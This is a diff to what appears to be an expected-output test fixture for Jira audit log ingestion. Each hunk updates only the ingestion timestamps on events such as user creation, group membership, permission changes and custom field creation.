@@ -491,7 +491,7 @@ }, "event": { "action": "jira.auditing.user.created", - "ingested": "2021-12-08T14:50:53.782536675Z", + "ingested": "2021-12-15T09:00:47.652607271Z", "original": "{\"affectedObjects\":[{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User created\",\"actionI18nKey\":\"jira.auditing.user.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"user management\",\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.username\",\"key\":\"Username\",\"to\":\"test.user\"},{\"i18nKey\":\"common.words.fullname\",\"key\":\"Full name\",\"to\":\"Alex\"},{\"i18nKey\":\"common.words.email\",\"key\":\"Email\",\"to\":\"test.user@example.com\"},{\"i18nKey\":\"admin.common.phrases.active.inactive\",\"key\":\"Active / Inactive\",\"to\":\"Active\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":600000000},\"version\":\"1.0\"}", "type": [ "user", 
@@ -587,7 +587,7 @@ }, "event": { "action": "jira.auditing.user.added.to.group", - "ingested": "2021-12-08T14:50:53.782539333Z", + "ingested": "2021-12-15T09:00:47.652610010Z", "original": "{\"affectedObjects\":[{\"name\":\"jira-administrators\",\"type\":\"GROUP\"},{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"jira.auditing.user.added.to.group\",\"area\":\"USER_MANAGEMENT\",\"category\":\"group management\",\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":734000000},\"version\":\"1.0\"}", "type": [ "group", @@ -662,7 +662,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:53.782541787Z", + "ingested": "2021-12-15T09:00:47.652612800Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Bulk Change\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":750000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -738,7 +738,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:53.782544250Z", + "ingested": "2021-12-15T09:00:47.652615549Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Browse Users\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":751000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -814,7 +814,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:53.782546672Z", + "ingested": "2021-12-15T09:00:47.652618294Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Create Shared Objects\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":752000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -890,7 +890,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:53.782549315Z", + "ingested": "2021-12-15T09:00:47.652621195Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Group Filter Subscriptions\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":754000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -967,7 +967,7 @@ }, "event": { "action": "jira.auditing.user.added.to.group", - "ingested": "2021-12-08T14:50:53.782551766Z", + "ingested": "2021-12-15T09:00:47.652623943Z", "original": "{\"affectedObjects\":[{\"name\":\"jira-software-users\",\"type\":\"GROUP\"},{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"jira.auditing.user.added.to.group\",\"area\":\"USER_MANAGEMENT\",\"category\":\"group management\",\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":756000000},\"version\":\"1.0\"}", "type": [ "group", 
@@ -1042,7 +1042,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782554184Z", + "ingested": "2021-12-15T09:00:47.652626701Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539617,\"nano\":138000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1117,7 +1117,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782556614Z", + "ingested": "2021-12-15T09:00:47.652629589Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"Manage Sprints\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"\"},{\"from\":\"Project Role\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"\"},{\"from\":\"Administrators\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539617,\"nano\":158000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1192,7 +1192,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:53.782559050Z", + "ingested": "2021-12-15T09:00:47.652632198Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539617,\"nano\":162000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1267,7 +1267,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782561583Z", + "ingested": "2021-12-15T09:00:47.652633660Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10100\",\"name\":\"Team\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Team\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Team\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539618,\"nano\":318000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1337,7 +1337,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782564014Z", + "ingested": "2021-12-15T09:00:47.652634683Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10101\",\"name\":\"Parent Link\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Parent Link\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Parent Link\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539618,\"nano\":974000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1407,7 +1407,7 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-08T14:50:53.782566446Z", + "ingested": "2021-12-15T09:00:47.652635685Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10101\",\"name\":\"Parent Link\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field updated\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539618,\"nano\":990000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1465,7 +1465,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782568913Z", + "ingested": "2021-12-15T09:00:47.652636645Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10102\",\"name\":\"Target start\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Target start\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"The targeted start date. This custom field is created and required by Portfolio for Jira.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Target start\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":224000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1540,7 +1540,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782571321Z", + "ingested": "2021-12-15T09:00:47.652637579Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10103\",\"name\":\"Target end\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Target end\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"The targeted end date. This custom field is created and required by Portfolio for Jira.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Target end\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":266000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1615,7 +1615,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782573783Z", + "ingested": "2021-12-15T09:00:47.652638572Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10104\",\"name\":\"Original story points\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Original story points\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Original story points\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":313000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1685,7 +1685,7 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-08T14:50:53.782576207Z", + "ingested": "2021-12-15T09:00:47.652639491Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10102\",\"name\":\"Target start\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field updated\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":332000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1743,7 +1743,7 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-08T14:50:53.782578709Z", + "ingested": "2021-12-15T09:00:47.652640563Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10103\",\"name\":\"Target end\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field updated\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":340000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1801,7 +1801,7 @@ }, "event": { "action": "jira.auditing.issue.type.created", - "ingested": "2021-12-08T14:50:53.782581143Z", + "ingested": "2021-12-15T09:00:47.652641512Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Epic\",\"type\":\"ISSUE_TYPE\"}],\"auditType\":{\"action\":\"Issue type created\",\"actionI18nKey\":\"jira.auditing.issue.type.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"issue types\",\"categoryI18nKey\":\"jira.auditing.category.issuetypes\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":485000000},\"version\":\"1.0\"}", "type": [ "creation" 
@@ -1864,7 +1864,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782583567Z", + "ingested": "2021-12-15T09:00:47.652642470Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10105\",\"name\":\"Epic Name\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Epic Name\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Provide a short name to identify this epic.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Name of Epic\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":522000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -1939,7 +1939,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782585978Z", + "ingested": "2021-12-15T09:00:47.652643458Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10106\",\"name\":\"Epic Status\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Epic Status\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Epic Status field for Jira Software use only.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Status of Epic\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539621,\"nano\":644000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2014,7 +2014,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782588448Z", + "ingested": "2021-12-15T09:00:47.652644383Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10107\",\"name\":\"Epic Colour\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Epic Colour\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Epic Colour field for Jira Software use only.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Colour of Epic\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539621,\"nano\":669000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2089,7 +2089,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782590836Z", + "ingested": "2021-12-15T09:00:47.652645314Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10108\",\"name\":\"Sprint\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Sprint\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Jira Software sprint field\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Jira Sprint Field\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539622,\"nano\":694000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2164,7 +2164,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782593212Z", + "ingested": "2021-12-15T09:00:47.652646248Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10109\",\"name\":\"Epic Link\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Epic Link\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Choose an epic to assign this issue to.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Epic Link Relationship\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539622,\"nano\":725000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2239,7 +2239,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:53.782595639Z", + "ingested": "2021-12-15T09:00:47.652647177Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10110\",\"name\":\"Rank\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Rank\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Global rank field for Jira Software use only.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Global Rank\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539622,\"nano\":794000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2314,7 +2314,7 @@ }, "event": { "action": "jira.auditing.issue.type.created", - "ingested": "2021-12-08T14:50:53.782598052Z", + "ingested": "2021-12-15T09:00:47.652648126Z", "original": "{\"affectedObjects\":[{\"id\":\"10001\",\"name\":\"Story\",\"type\":\"ISSUE_TYPE\"}],\"auditType\":{\"action\":\"Issue type created\",\"actionI18nKey\":\"jira.auditing.issue.type.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"issue types\",\"categoryI18nKey\":\"jira.auditing.category.issuetypes\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539629,\"nano\":37000000},\"version\":\"1.0\"}", "type": [ "creation" 
